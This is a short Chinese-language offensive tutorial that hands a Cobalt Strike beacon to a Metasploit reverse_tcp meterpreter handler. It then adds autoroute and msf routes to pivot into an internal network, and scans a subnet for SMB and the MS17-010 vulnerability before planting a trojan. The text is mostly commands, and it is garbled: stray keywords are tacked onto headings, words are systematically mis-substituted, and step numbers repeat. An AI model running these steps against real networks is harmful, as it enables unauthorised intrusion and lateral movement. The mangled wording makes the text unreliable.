第一步html
第二步python
选择要派生的beacon,右键-->增长会话,选择刚刚配置的foreign监听器linux
第三部 msfsql
msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp
第四步添加路由shell
若是在meterpreter中数据库
run get_local_subnets 查看目标内网路由
run autoroute -s 100.0.0.0/8 #(根据目标内网网络而定) 添加路由
run autoroute –p 通常来讲,在meterpreter中设置路由即可以达到通往其内网的目的。然而有些时候仍是会失败,这时咱们能够background返回msf>,查看下外面的路由状况。
若是没有路由规则 那么能够在msf中windows
msf>route add 10.0.0.0 255.0.0.0 1
说明:1表示session 1,攻击机若是要去访问10.0.0.0/8网段的资源,其下一跳是session1,至于什么是下一条这里很少说了,反正就是目前攻击机能够访问内网资源了。
而后网络
链接postgresql数据库,不链接的话扫描的信息的信息没法入库。链接上后可经过db_status查看状态。
Kali linux:
首先启动数据库:service postgresql start
启动msfsploit服务:service metasploit start
启动msfconsole:msfconsole
使用db_status确认数据库是否正确链接
若是默认没有连接的话能够先本身装一个postgresql数据库,而后新建一个名为msf的库,在msf中执行命令链接:db_connect postgres:123456@127.0.0.1:5433/msfsession
第三步:运行smb模块探测主机445端口开放状况。tcp
use auxiliary/scanner/smb/smb_version set rhosts 192.168.236.129/24 set threads 16 run
扫描完成后,扫描的信息会自动存入数据库,可经过hosts命令查看
第四步:使用smb_ms17_010模块探测MS17-010漏洞
use auxiliary/scanner/smb/smb_ms17_010 show options set threads 16 services -r tcp -p 445 -R run
而后就是一系列的上马这些操做了 能够ipc也能够msf的upload
文献参考
https://www.cnblogs.com/backlion/p/9484949.html msf命令操做
https://www.4hou.com/tools/4765.html
https://bbs.ichunqiu.com/thread-53044-1-1.html cs